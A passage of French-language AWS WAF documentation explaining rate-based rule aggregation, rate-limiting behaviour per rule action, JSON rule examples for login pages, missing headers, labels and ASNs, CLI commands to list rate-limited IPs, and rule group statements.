  + **Adresse IP dans l'en-tête** — Agrégez en utilisant l'adresse du client dans un en-tête HTTP en combinaison avec d'autres clés. Cette adresse est également appelée adresse IP transférée. 

    Soyez prudent avec cette option, car les en-têtes peuvent être gérés de manière incohérente par les proxys et ils peuvent être modifiés pour contourner l'inspection. Pour plus d'informations et les meilleures pratiques, consultez[Utilisation des adresses IP transférées dans AWS WAF](waf-rule-statement-forwarded-ip-address.md).

# Instances et nombres d'agrégation de règles basés sur le taux
<a name="waf-rule-statement-type-rate-based-aggregation-instances"></a>

Cette section explique comment une règle basée sur le taux évalue les requêtes Web.

Lorsqu'une règle basée sur le taux évalue les requêtes Web à l'aide de vos critères d'agrégation, chaque ensemble unique de valeurs trouvé par la règle pour les clés d'agrégation spécifiées définit une instance d'*agrégation* unique. 
+ **Clés multiples** : si vous avez défini plusieurs clés personnalisées, la valeur de chaque clé contribue à la définition de l'instance d'agrégation. Chaque combinaison unique de valeurs définit une instance d'agrégation. 
+ **Clé unique** : si vous avez choisi une seule clé, soit dans les clés personnalisées, soit en sélectionnant l'une des adresses IP singleton, chaque valeur unique de la clé définit une instance d'agrégation. 
+ **Tout compter, aucune clé** : si vous avez sélectionné l'option d'agrégation **Tout compter**, toutes les demandes évaluées par la règle appartiennent à une seule instance d'agrégation pour la règle. Ce choix nécessite une instruction scope-down.

 

Une règle basée sur le taux compte les requêtes Web séparément pour chaque instance d'agrégation qu'elle identifie. 

Supposons, par exemple, qu'une règle basée sur le débit évalue les requêtes Web avec l'adresse IP et les valeurs de méthode HTTP suivantes : 
+ Adresse IP 10.1.1.1, méthode HTTP POST
+ Adresse IP 10.1.1.1, méthode HTTP GET
+ Adresse IP 127.0.0.0, méthode HTTP POST
+ Adresse IP 10.1.1.1, méthode HTTP GET

La règle crée différentes instances d'agrégation en fonction de vos critères d'agrégation. 
+ Si le critère d'agrégation est uniquement l'adresse IP, chaque adresse IP individuelle est une instance d'agrégation et AWS WAF compte les demandes séparément pour chacune d'entre elles. Dans notre exemple, les instances d'agrégation et le nombre de demandes seraient les suivants : 
  + Adresse IP 10.1.1.1 : compte 3
  + Adresse IP 127.0.0.0 : compte 1
+ Si le critère d'agrégation est la méthode HTTP, chaque méthode HTTP individuelle est une instance d'agrégation. Dans notre exemple, les instances d'agrégation et le nombre de demandes seraient les suivants : 
  + Méthode HTTP POST : compte 2
  + Méthode HTTP GET : count 2
+ Si les critères d'agrégation sont l'adresse IP et la méthode HTTP, chaque adresse IP et chaque méthode HTTP contribueront à l'instance d'agrégation combinée. Dans notre exemple, les instances d'agrégation et le nombre de demandes seraient les suivants : 
  + Adresse IP 10.1.1.1, méthode HTTP POST : compte 1
  + Adresse IP 10.1.1.1, méthode HTTP GET : count 2
  + Adresse IP 127.0.0.0, méthode HTTP POST : compte 1

# Appliquer une limite de débit aux demandes en AWS WAF
<a name="waf-rule-statement-type-rate-based-request-limiting"></a>

Cette section explique comment fonctionne le comportement de limitation de débit pour les règles basées sur le débit.

Les critères AWS WAF utilisés pour limiter le débit des demandes pour une règle basée sur le taux sont les mêmes que ceux AWS WAF utilisés pour agréger les demandes relatives à la règle. Si vous définissez une instruction de portée réduite pour la règle, AWS WAF seuls les agrégats, les dénombrements et les demandes de limite de débit correspondent à l'instruction de portée réduite. 

Les critères de correspondance qui amènent une règle basée sur le taux à appliquer ses paramètres d'action de règle à une requête Web spécifique sont les suivants : 
+ La requête Web correspond à l'instruction scope-down de la règle, si une telle instruction est définie.
+ La requête Web appartient à une instance d'agrégation dont le nombre de demandes est actuellement supérieur à la limite fixée par la règle. 

**Comment AWS WAF s'applique l'action de la règle**  
Lorsqu'une règle basée sur le taux applique une limitation de débit à une demande, elle applique l'action de la règle et, si vous avez défini un traitement ou un étiquetage personnalisé dans votre spécification d'action, la règle les applique. Cette gestion des demandes est identique à la manière dont une règle de correspondance applique ses paramètres d'action aux requêtes Web correspondantes. Une règle basée sur le taux applique uniquement des libellés ou exécute d'autres actions sur les demandes pour lesquelles elle limite activement le débit. 

Vous pouvez utiliser n'importe quelle action de règle, à l'exception deAllow. Pour des informations générales sur les actions relatives aux règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). 

La liste suivante décrit le fonctionnement de la limitation de débit pour chacune des actions.
+ **Block**— AWS WAF bloque la demande et applique tout comportement de blocage personnalisé que vous avez défini. 
+ **Count**— AWS WAF compte la demande, applique les en-têtes ou étiquettes personnalisés que vous avez définis et poursuit l'évaluation de la demande par le pack de protection (ACL Web). 

  Cette action ne limite pas le nombre de demandes. Il ne compte que les demandes qui dépassent la limite.
+ **CAPTCHAor Challenge** — AWS WAF gère la demande comme a Block ou comme aCount, selon l'état du jeton de la demande. 

  Cette action ne limite pas le nombre de demandes contenant des jetons valides. Cela limite le taux de demandes dépassant la limite et pour lesquelles il manque également des jetons valides.
  + Si la demande ne contient pas de jeton valide et non expiré, l'action bloque la demande et renvoie le casse-tête CAPTCHA ou le défi du navigateur au client. 

    Si l'utilisateur final ou le navigateur du client répond correctement, le client reçoit un jeton valide et renvoie automatiquement la demande initiale. Si la limitation du débit pour l'instance d'agrégation est toujours en vigueur, l'action sera appliquée à cette nouvelle demande contenant le jeton valide et non expiré, comme décrit dans le point suivant de la bullet.
  + Si la demande contient un jeton valide et non expiré, l'Challengeaction CAPTCHA ou vérifie le jeton et n'entreprend aucune action sur la demande, de la même manière que l'Countaction. La règle basée sur le taux renvoie l'évaluation de la demande au pack de protection (ACL Web) sans prendre aucune mesure de résiliation, et le pack de protection (ACL Web) poursuit son évaluation de la demande.

  Pour plus d’informations, consultez [CAPTCHAet Challenge dans AWS WAF](waf-captcha-and-challenge.md).

**Si vous limitez le débit uniquement à l'adresse IP ou à l'adresse IP transférée**  
Lorsque vous configurez la règle pour limiter uniquement le débit de l'adresse IP pour l'adresse IP transférée, vous pouvez récupérer la liste des adresses IP pour lesquelles la règle limite actuellement le débit. Si vous utilisez une instruction scope-down, les demandes dont le débit est limité sont uniquement celles de la liste d'adresses IP qui correspondent à l'instruction scope-down. Pour plus d'informations sur la récupération de la liste d'adresses IP, consultez[Répertorier les adresses IP dont le débit est limité par des règles basées sur le débit](listing-managed-ips.md).

# Exemples de règles basées sur le taux dans AWS WAF
<a name="waf-rule-statement-type-rate-based-examples"></a>

Cette section décrit des exemples de configuration pour divers cas d'utilisation courants de règles basées sur les taux. 

Chaque exemple fournit une description du cas d'utilisation, puis montre la solution dans les listes JSON pour les règles configurées personnalisées. 

**Note**  
Les listes JSON présentées dans ces exemples ont été créées dans la console en configurant la règle, puis en la modifiant à l'aide de l'**éditeur Rule JSON**. 

**Topics**
+ [Limiter le débit des demandes à une page de connexion](waf-rate-based-example-limit-login-page.md)
+ [Débit : limite les demandes adressées à une page de connexion à partir de n'importe quelle adresse IP ou paire d'agents utilisateurs](waf-rate-based-example-limit-login-page-keys.md)
+ [Limite de débit les demandes pour lesquelles il manque un en-tête spécifique](waf-rate-based-example-limit-missing-header.md)
+ [Débit : limitez les demandes avec des étiquettes spécifiques](waf-rate-based-example-limit-labels.md)
+ [Limite de débit les demandes d'étiquettes ayant un espace de noms d'étiquette spécifié](waf-rate-based-example-limit-label-aggregation.md)
+ [Débit : limitez les demandes avec des ASNs](waf-rate-based-example-limit-asn.md)

# Limiter le débit des demandes à une page de connexion
<a name="waf-rate-based-example-limit-login-page"></a>

**Pour limiter le nombre de demandes adressées à la page de connexion de votre site Web sans affecter le trafic vers le reste de votre site, vous pouvez créer une règle basée sur le taux avec une instruction de délimitation qui fait correspondre les demandes à votre page de connexion et avec l'agrégation des demandes définie sur Tout compter.** 

La règle basée sur le taux comptera toutes les demandes pour la page de connexion dans une seule instance d'agrégation et appliquera l'action de la règle à toutes les demandes correspondant à l'instruction scope-down lorsque les demandes dépassent la limite.

La liste JSON suivante montre un exemple de cette configuration de règle. L'option d'agrégation Count All est répertoriée dans le JSON en tant que paramètre`CONSTANT`. Cet exemple correspond aux pages de connexion qui commencent par`/login`. 

```
{
  "Name": "test-rbr",
  "Priority": 0,
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "test-rbr"
  },
  "Statement": {
    "RateBasedStatement": {
      "Limit": 1000,
      "EvaluationWindowSec": 300,
      "AggregateKeyType": "CONSTANT",
      "ScopeDownStatement": {
        "ByteMatchStatement": {
          "FieldToMatch": {
            "UriPath": {}
          },
          "PositionalConstraint": "STARTS_WITH",
          "SearchString": "/login",
          "TextTransformations": [
            {
              "Type": "NONE",
              "Priority": 0
            }
          ]
        }
      }
    }
  }
}
```

# Débit : limite les demandes adressées à une page de connexion à partir de n'importe quelle adresse IP ou paire d'agents utilisateurs
<a name="waf-rate-based-example-limit-login-page-keys"></a>

Pour limiter le nombre de demandes d'adresse IP adressées à la page de connexion de votre site Web, définissez les paires d'agents utilisateurs qui dépassent votre limite, définissez l'agrégation des demandes **sur Clés personnalisées** et fournissez les critères d'agrégation. 

La liste JSON suivante montre un exemple de cette configuration de règle. Dans cet exemple, nous avons fixé la limite à 100 demandes par période de cinq minutes par adresse IP, paire d'agents utilisateurs. 

```
{
  "Name": "test-rbr",
  "Priority": 0,
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "test-rbr"
  },
  "Statement": {
    "RateBasedStatement": {
      "Limit": 100,
      "EvaluationWindowSec": 300,
      "AggregateKeyType": "CUSTOM_KEYS",
      "CustomKeys": [
        {
          "Header": {
            "Name": "User-Agent",
            "TextTransformations": [
              {
                "Priority": 0,
                "Type": "NONE"
              }
            ]
          }
        },
        {
          "IP": {}
        }
      ],
      "ScopeDownStatement": {
        "ByteMatchStatement": {
          "FieldToMatch": {
            "UriPath": {}
          },
          "PositionalConstraint": "STARTS_WITH",
          "SearchString": "/login",
          "TextTransformations": [
            {
              "Type": "NONE",
              "Priority": 0
            }
          ]
        }
      }
    }
  }
}
```

# Limite de débit les demandes pour lesquelles il manque un en-tête spécifique
<a name="waf-rate-based-example-limit-missing-header"></a>

Pour limiter le nombre de demandes auxquelles il manque un en-tête spécifique, vous pouvez utiliser l'option d'agrégation **Count all** avec une instruction scope-down. Configurez l'instruction scope-down avec une `NOT` instruction logique contenant une instruction qui renvoie true uniquement si l'en-tête existe et possède une valeur. 

La liste JSON suivante montre un exemple de cette configuration de règle. 

```
{
  "Name": "test-rbr",
  "Priority": 0,
  "Action": {
    "Block": {}
  },
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "test-rbr"
  },
  "Statement": {
    "RateBasedStatement": {
      "Limit": 1000,
      "AggregateKeyType": "CONSTANT",
      "EvaluationWindowSec": 300,
      "ScopeDownStatement": {
        "NotStatement": {
          "Statement": {
            "SizeConstraintStatement": {
              "FieldToMatch": {
                "SingleHeader": {
                  "Name": "user-agent"
                }
              },
              "ComparisonOperator": "GT",
              "Size": 0,
              "TextTransformations": [
                {
                  "Type": "NONE",
                  "Priority": 0
                }
              ]
            }
          }
        }
      }
    }
  }
}
```

# Débit : limitez les demandes avec des étiquettes spécifiques
<a name="waf-rate-based-example-limit-labels"></a>

Pour limiter le nombre de demandes de différentes catégories, vous pouvez combiner la limitation de débit avec n'importe quelle règle ou groupe de règles qui ajoute des étiquettes aux demandes. Pour ce faire, configurez votre pack de protection (ACL Web) comme suit : 
+ Ajoutez les règles ou les groupes de règles qui ajoutent des étiquettes, et configurez-les de manière à ce qu'ils ne bloquent pas ou n'autorisent pas les demandes pour lesquelles vous souhaitez limiter le débit. Si vous utilisez des groupes de règles gérés, vous devrez peut-être annuler certaines actions des règles des groupes de règles Count pour obtenir ce comportement. 
+ Ajoutez une règle basée sur le taux à votre pack de protection (ACL Web) avec un paramètre de numéro de priorité supérieur aux règles d'étiquetage et aux groupes de règles. AWS WAF évalue les règles par ordre numérique, en commençant par le plus bas, afin que votre règle basée sur les taux soit exécutée après les règles d'étiquetage. Configurez votre limite de débit sur les étiquettes en combinant la correspondance des étiquettes dans l'énoncé de portée réduite de la règle et l'agrégation d'étiquettes. 

L'exemple suivant utilise le groupe de règles AWS Managed Rules de la liste de réputation Amazon IP. La règle du groupe de règles `AWSManagedIPDDoSList` détecte et étiquette les demandes dont IPs on sait qu'elles participent activement à des activités DDo S. L'action de la règle est configurée Count dans la définition du groupe de règles. Pour plus d'informations sur le groupe de règles, consultez[Groupe de règles géré par Amazon IP Reputation](aws-managed-rule-groups-ip-rep.md#aws-managed-rule-groups-ip-rep-amazon).

La liste JSON du pack de protection (ACL Web) suivante utilise le groupe de règles de réputation IP suivi d'une règle basée sur le taux de correspondance des étiquettes. La règle basée sur le taux utilise une instruction scope-down pour filtrer les demandes qui ont été marquées par la règle du groupe de règles. L'énoncé de règle basé sur le taux agrège et limite le débit des demandes filtrées en fonction de leur adresse IP. 

```
{
  "Name": "test-web-acl",
  "Id": ... 
  "ARN": ...
  "DefaultAction": {
    "Allow": {}
  },
  "Description": "",
  "Rules": [
    {
      "Name": "AWS-AWSManagedRulesAmazonIpReputationList",
      "Priority": 0,
      "Statement": {
        "ManagedRuleGroupStatement": {
          "VendorName": "AWS",
          "Name": "AWSManagedRulesAmazonIpReputationList"
        }
      },
      "OverrideAction": {
        "None": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "AWS-AWSManagedRulesAmazonIpReputationList"
      }
    },
    {
      "Name": "test-rbr",
      "Priority": 1,
      "Statement": {
        "RateBasedStatement": {
          "Limit": 100,
          "EvaluationWindowSec": 300,
          "AggregateKeyType": "IP",
          "ScopeDownStatement": {
            "LabelMatchStatement": {
              "Scope": "LABEL",
              "Key": "awswaf:managed:aws:amazon-ip-list:AWSManagedIPDDoSList"
            }
          }
        }
      },
      "Action": {
        "Block": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "test-rbr"
      }
    }
  ],
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "test-web-acl"
  },
  "Capacity": 28,
  "ManagedByFirewallManager": false,
  "RetrofittedByFirewallManager": false,
  "LabelNamespace": "awswaf:0000000000:webacl:test-web-acl:"
}
```

# Limite de débit les demandes d'étiquettes ayant un espace de noms d'étiquette spécifié
<a name="waf-rate-based-example-limit-label-aggregation"></a>

**Note**  
Les règles de niveau commun du groupe de règles gérées par Bot Control ajoutent des étiquettes pour les robots de différentes catégories, mais elles bloquent uniquement les demandes provenant de robots non vérifiés. Pour plus d'informations sur ces règles, consultez[Liste des règles de contrôle des bots](aws-managed-rule-groups-bot.md#aws-managed-rule-groups-bot-rules).

Si vous utilisez le groupe de règles géré par Bot Control, vous pouvez ajouter une limite de débit pour les demandes provenant de robots individuels vérifiés. Pour ce faire, vous ajoutez une règle basée sur le taux qui s'exécute après le groupe de règles Bot Control et agrège les demandes en fonction de leurs étiquettes de nom de bot. Vous spécifiez la clé d'agrégation de **l'espace de noms Label** et définissez la clé d'espace de noms sur. `awswaf:managed:aws:bot-control:bot:name:` Chaque étiquette unique avec l'espace de noms spécifié définira une instance d'agrégation. Par exemple, les étiquettes `awswaf:managed:aws:bot-control:bot:name:axios` et `awswaf:managed:aws:bot-control:bot:name:curl` chacune définissent une instance d'agrégation.

La liste JSON du pack de protection (ACL Web) suivante montre cette configuration. La règle décrite dans cet exemple limite les demandes pour une instance d'agrégation de robots uniques à 1 000 sur une période de deux minutes. 

```
{
  "Name": "test-web-acl",
  "Id": ... 
  "ARN": ...
  "DefaultAction": {
    "Allow": {}
  },
  "Description": "",
  "Rules": [
    {
      "Name": "AWS-AWSManagedRulesBotControlRuleSet",
      "Priority": 0,
      "Statement": {
        "ManagedRuleGroupStatement": {
          "VendorName": "AWS",
          "Name": "AWSManagedRulesBotControlRuleSet",
          "ManagedRuleGroupConfigs": [
            {
              "AWSManagedRulesBotControlRuleSet": {
                "InspectionLevel": "COMMON"
              }
            }
          ]
        }
      },
      "OverrideAction": {
        "None": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "AWS-AWSManagedRulesBotControlRuleSet"
      }
    },
    {
      "Name": "test-rbr",
      "Priority": 1,
      "Statement": {
        "RateBasedStatement": {
          "Limit": 1000,
          "EvaluationWindowSec": 120,
          "AggregateKeyType": "CUSTOM_KEYS",
          "CustomKeys": [
            {
              "LabelNamespace": {
                "Namespace": "awswaf:managed:aws:bot-control:bot:name:"
              }
            }
          ]
        }
      },
      "Action": {
        "Block": {}
      },
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "test-rbr"
      }
    }
  ],
  "VisibilityConfig": {
    "SampledRequestsEnabled": true,
    "CloudWatchMetricsEnabled": true,
    "MetricName": "test-web-acl"
  },
  "Capacity": 82,
  "ManagedByFirewallManager": false,
  "RetrofittedByFirewallManager": false,
  "LabelNamespace": "awswaf:0000000000:webacl:test-web-acl:"
}
```

# Débit : limitez les demandes avec des ASNs
<a name="waf-rate-based-example-limit-asn"></a>

Pour limiter le nombre de demandes provenant de numéros de système autonome spécifiques (ASNs) en fonction de l'adresse IP des demandes, définissez l'agrégation des demandes sur des *clés personnalisées* et fournissez les critères d'agrégation.

Le JSON suivant montre un exemple d'agrégation de règles ASNs dérivée des adresses IP transférées trouvées dans l'`X-Forwarded-For`en-tête. S'il n'est pas AWS WAF possible de dériver un ASN parce que l'adresse IP est mal formée, le comportement de secours est défini sur. `MATCH`

```
{
    "Name": "test-rbr",
    "Priority": 0,
    "Statement": {
        "RateBasedStatement": {
            "AggregateKeyType": "CUSTOM_KEYS",
            "CustomKeys": [
                {
                    "ASN": {}
                },
                {
                    "ForwardedIP": {}
                }
            ],
            "EvaluationWindowSec": 300,
            "ForwardedIPConfig": {
                "FallbackBehavior": "MATCH",
                "HeaderName": "X-Forwarded-For"
            },
            "Limit": 2000
        }
    },
    "VisibilityConfig": {
        "CloudWatchMetricsEnabled": true,
        "MetricName": "test-rbr",
        "SampledRequestsEnabled": true
    }
}
```

# Répertorier les adresses IP dont le débit est limité par des règles basées sur le débit
<a name="listing-managed-ips"></a>

Cette section explique comment accéder à la liste des adresses IP actuellement limitées par une règle basée sur le débit à l'aide de la CLI, de l'API ou de l'un des. SDKs 

Si votre règle basée sur le taux ne s'agrège que sur l'adresse IP ou l'adresse IP transférée, vous pouvez récupérer la liste des adresses IP pour lesquelles la règle limite actuellement le débit. AWS WAF stocke ces adresses IP dans la liste des clés gérées de la règle. 

**Note**  
Cette option n'est disponible que si vous regroupez uniquement l'adresse IP ou uniquement une adresse IP dans un en-tête. Si vous utilisez l'agrégation de demandes de clés personnalisées, vous ne pouvez pas récupérer une liste d'adresses IP à débit limité, même si vous utilisez l'une des spécifications d'adresse IP dans vos clés personnalisées.

Une règle basée sur le taux applique son action aux demandes de la liste des clés gérées de la règle qui correspondent à l'instruction scope-down de la règle. Lorsqu'une règle ne comporte aucune instruction de portée réduite, elle applique l'action à toutes les demandes provenant des adresses IP figurant dans la liste. L'action de règle est Block par défaut, mais il peut s'agir de n'importe quelle action de règle valide, à l'exception deAllow. Le nombre maximum d'adresses IP AWS WAF pouvant limiter le débit à l'aide d'une seule instance de règle basée sur le débit est de 10 000. Si plus de 10 000 adresses dépassent la limite de débit, AWS WAF limite celles présentant les taux les plus élevés. 

Vous pouvez accéder à la liste des clés gérées d'une règle basée sur le taux à l'aide de la CLI, de l'API ou de l' SDKsun des. Cette rubrique couvre l'accès à l'aide de la CLI et APIs. La console ne permet pas d'accéder à la liste pour le moment. 

Pour l' AWS WAF API, la commande est [GetRateBasedStatementManagedKeys](https://docs.aws.amazon.com/waf/latest/APIReference/API_GetRateBasedStatementManagedKeys.html).

Pour la AWS WAF CLI, la commande est [get-rate-based-statement-managed-keys](https://docs.aws.amazon.com/cli/latest/reference/wafv2/get-rate-based-statement-managed-keys.html). 

Voici la syntaxe permettant de récupérer la liste des adresses IP à débit limité pour une règle basée sur le débit utilisée dans un pack de protection (ACL Web) sur une distribution Amazon CloudFront .

```
aws wafv2 get-rate-based-statement-managed-keys --scope=CLOUDFRONT --region=us-east-1 --web-acl-name=WebACLName --web-acl-id=WebACLId --rule-name=RuleName
```

Voici la syntaxe d'une application régionale, d'une API REST Amazon API Gateway, d'un Application Load Balancer, d'une API AWS AppSync GraphQL, d'un groupe d'utilisateurs Amazon Cognito, d'un AWS App Runner service ou d'une instance Verified Access AWS Amplify. AWS 

```
aws wafv2 get-rate-based-statement-managed-keys --scope=REGIONAL --region=region --web-acl-name=WebACLName --web-acl-id=WebACLId --rule-name=RuleName
```

AWS WAF surveille les requêtes Web et gère les clés indépendamment pour chaque combinaison unique de pack de protection (ACL Web), de groupe de règles facultatif et de règle basée sur le taux. Par exemple, si vous définissez une règle basée sur le taux au sein d'un groupe de règles, puis que vous utilisez le groupe de règles dans un pack de protection (ACL Web), AWS WAF vous surveillez les requêtes Web et gérez les clés pour ce pack de protection (ACL Web), la déclaration de référence du groupe de règles et l'instance de règle basée sur le taux. Si vous utilisez le même groupe de règles dans un deuxième pack de protection (ACL Web), AWS WAF surveille les requêtes Web et gère les clés pour cette deuxième utilisation de manière totalement indépendante de la première.

Pour une règle basée sur le taux que vous avez définie au sein d'un groupe de règles, vous devez fournir le nom de la déclaration de référence du groupe de règles dans votre demande, en plus du nom du pack de protection (ACL Web) et du nom de la règle basée sur le taux au sein du groupe de règles. Voici la syntaxe d'une application régionale dans laquelle la règle basée sur le taux est définie au sein d'un groupe de règles et le groupe de règles est utilisé dans un pack de protection (ACL Web). 

```
aws wafv2 get-rate-based-statement-managed-keys --scope=REGIONAL --region=region --web-acl-name=WebACLName --web-acl-id=WebACLId --rule-group-rule-name=RuleGroupRuleName --rule-name=RuleName
```

# Utilisation des déclarations de règles relatives aux groupes de règles dans AWS WAF
<a name="waf-rule-statements-rule-group"></a>

**Note**  
Les déclarations de règles relatives aux groupes de règles ne sont pas imbriquables. 

Cette section décrit les instructions de règles du groupe de règles que vous pouvez utiliser dans votre pack de protection (ACL Web). Les unités de capacité du pack de protection du groupe de règles (ACL WebWCUs) () sont définies par le propriétaire du groupe de règles au moment de sa création. Pour plus d'informations sur WCUs, voir[Unités de capacité Web ACL (WCUs) en AWS WAF](aws-waf-capacity-units.md). 


| Instruction de groupe de règles | Description | WCUs | 
| --- | --- | --- | 
|  [Utilisation d'instructions de groupes de règles gérés](waf-rule-statement-type-managed-rule-group.md)  |  Exécute les règles définies dans le groupe de règles gérées spécifié.  Vous pouvez réduire la portée des demandes évaluées par le groupe de règles en ajoutant une instruction scope-down.  Vous ne pouvez pas imbriquer une instruction de groupe de règles géré dans un autre type d'instruction.  |  Défini par le groupe de règles, plus toute instruction supplémentaire WCUs pour une instruction de portée réduite.  | 
| [Utilisation d'instructions de groupes de règles](waf-rule-statement-type-rule-group.md) | Exécute les règles définies dans un groupe de règles que vous gérez.  Vous ne pouvez pas ajouter d'instruction de portée réduite à une déclaration de référence de groupe de règles pour votre propre groupe de règles.  Vous ne pouvez pas imbriquer une instruction de groupe de règles dans un autre type d'instruction  | Vous définissez la limite WCU pour le groupe de règles lorsque vous le créez. | 

# Utilisation des instructions de groupes de règles gérés dans AWS WAF
<a name="waf-rule-statement-type-managed-rule-group"></a>

Cette section explique le fonctionnement des instructions de règles des groupes de règles gérés.

L'instruction de règle du groupe de règles géré ajoute une référence à un groupe de règles géré dans la liste des règles de votre pack de protection (ACL Web). Cette option ne figure pas dans vos instructions de règle sur la console, mais lorsque vous utilisez le format JSON de votre ACL Web, tous les groupes de règles gérés que vous avez ajoutés apparaissent sous les règles du pack de protection (ACL Web) sous ce type.

Un groupe de règles géré est soit un groupe de règles AWS gérées, dont la plupart sont gratuites pour les AWS WAF clients, soit un groupe de règles AWS Marketplace géré. Vous vous abonnez automatiquement aux groupes de règles AWS Managed Rules payants lorsque vous les ajoutez à votre pack de protection (ACL Web). Vous pouvez vous abonner à des groupes de règles AWS Marketplace gérés via AWS Marketplace. Pour de plus amples informations, veuillez consulter [Utilisation de groupes de règles gérés dans AWS WAF](waf-managed-rule-groups.md).

Lorsque vous ajoutez un groupe de règles à un pack de protection (ACL Web), vous pouvez remplacer les actions des règles du groupe par Count ou par une autre action de règle. Pour de plus amples informations, veuillez consulter [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md).

Vous pouvez réduire la portée des demandes AWS WAF évaluées à l'aide du groupe de règles. Pour ce faire, vous devez ajouter une instruction scope-down dans l'instruction du groupe de règles. Pour plus d'informations sur les instructions de portée réduite, voir. [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md) Cela peut vous aider à gérer l'impact du groupe de règles sur votre trafic et à contenir les coûts associés au volume de trafic lorsque vous utilisez le groupe de règles. Pour obtenir des informations et des exemples d'utilisation des instructions de portée réduite avec le groupe de règles géré par AWS WAF Bot Control, consultez. [AWS WAF Contrôle des robots](waf-bot-control.md)

## Caractéristiques de l'énoncé des règles
<a name="managed-rule-group-rule-statement-characteristics"></a>

**Non imbriquable** : vous ne pouvez pas imbriquer ce type d'instruction dans d'autres instructions, ni l'inclure dans un groupe de règles. Vous pouvez l'inclure directement dans un pack de protection (ACL Web). 

**(Facultatif) Instruction de portée réduite** : ce type de règle utilise une instruction de portée réduite facultative, afin de réduire la portée des demandes évaluées par le groupe de règles. Pour de plus amples informations, veuillez consulter [Utilisation d'instructions scope-down dans AWS WAF](waf-rule-scope-down-statements.md).

**WCUs**— Défini pour le groupe de règles lors de sa création.

## Où trouver cette déclaration de règle
<a name="managed-rule-group-rule-statement-where-to-find"></a>
+ **Console** — Au cours du processus de création d'un pack de protection (ACL Web), sur la page **Ajouter des règles et des groupes** de **règles, choisissez Ajouter des groupes de règles gérés**, puis recherchez et sélectionnez le groupe de règles que vous souhaitez utiliser.
+ **API** — [ManagedRuleGroupStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_ManagedRuleGroupStatement.html)

# Utilisation des instructions de groupe de règles dans AWS WAF
<a name="waf-rule-statement-type-rule-group"></a>

Cette section explique le fonctionnement des instructions de règles relatives aux groupes de règles.

L'instruction de règle du groupe de règles ajoute une référence à la liste des règles de votre pack de protection (ACL Web) à un groupe de règles que vous gérez. Cette option ne figure pas dans vos instructions de règles sur la console, mais lorsque vous utilisez le format JSON de votre pack de protection (ACL Web), tous les groupes de règles que vous avez ajoutés apparaissent sous les règles du pack de protection (ACL Web) sous ce type. Pour de plus amples informations sur l'utilisation de vos propres groupes de règles, reportez-vous à la section [Gestion de vos propres groupes de règles](waf-user-created-rule-groups.md).

Lorsque vous ajoutez un groupe de règles à un pack de protection (ACL Web), vous pouvez remplacer les actions des règles du groupe par Count ou par une autre action de règle. Pour de plus amples informations, veuillez consulter [Remplacer les actions du groupe de règles dans AWS WAF](web-acl-rule-group-override-options.md).

## Caractéristiques de l'énoncé des règles
<a name="rule-group-rule-statement-characteristics"></a>

**Non imbriquable** : vous ne pouvez pas imbriquer ce type d'instruction dans d'autres instructions, ni l'inclure dans un groupe de règles. Vous pouvez l'inclure directement dans un pack de protection (ACL Web). 

**WCUs**— Défini pour le groupe de règles lors de sa création.

## Où trouver cette déclaration de règle
<a name="rule-group-rule-statement-where-to-find"></a>
+ **Console** — Au cours du processus de création d'un pack de protection (ACL Web), sur la page **Ajouter des règles et des groupes** de règles, sélectionnez **Ajouter mes propres règles et groupes** de **règles, Groupe** de règles, puis ajoutez le groupe de règles que vous souhaitez utiliser.
+ **API** — [RuleGroupReferenceStatement](https://docs.aws.amazon.com/waf/latest/APIReference/API_RuleGroupReferenceStatement.html)

# AWS WAF groupes de règles
<a name="waf-rule-groups"></a>

Cette section explique ce qu'est un groupe de règles et comment il fonctionne.

Un groupe de règles est un ensemble de règles réutilisables que vous pouvez ajouter à un pack de protection (ACL Web). Pour plus d'informations sur les packs de protection (Web ACLs), consultez[Configuration de la protection dans AWS WAF](web-acl.md).

Les groupes de règles se répartissent dans les principales catégories suivantes : 
+ Vos propres groupes de règles, que vous créez et gérez. 
+ Groupes de règles AWS gérés que les équipes chargées des règles gérées créent et gèrent pour vous. 
+ Groupes de règles gérés que AWS Marketplace les vendeurs créent et gèrent pour vous. 
+ Groupes de règles détenus et gérés par d'autres services tels que AWS Firewall Manager Shield Advanced.

**Différences entre les groupes de règles et les packs de protection (Web ACLs)**  
Les groupes de règles et les packs de protection (Web ACLs) contiennent tous deux des règles, qui sont définies de la même manière aux deux endroits. Les groupes de règles diffèrent des packs de protection (Web ACLs) pour les raisons suivantes : 
+ Les groupes de règles ne peuvent pas contenir d'instructions de référence de groupes de règles. 
+ Vous pouvez réutiliser un seul groupe de règles dans plusieurs packs de protection (Web ACLs) en ajoutant une déclaration de référence de groupe de règles à chaque pack de protection (ACL Web). Vous ne pouvez pas réutiliser un pack de protection (ACL Web).
+ Les groupes de règles n'ont pas d'actions par défaut. Dans un pack de protection (ACL Web), vous définissez une action par défaut pour chaque règle ou groupe de règles que vous incluez. Une action est définie pour chaque règle individuelle au sein d'un groupe de règles ou d'un pack de protection (ACL Web). 
+ Vous n'associez pas directement un groupe de règles à une AWS ressource. Pour protéger les ressources à l'aide d'un groupe de règles, vous devez utiliser le groupe de règles dans un pack de protection (ACL Web). 
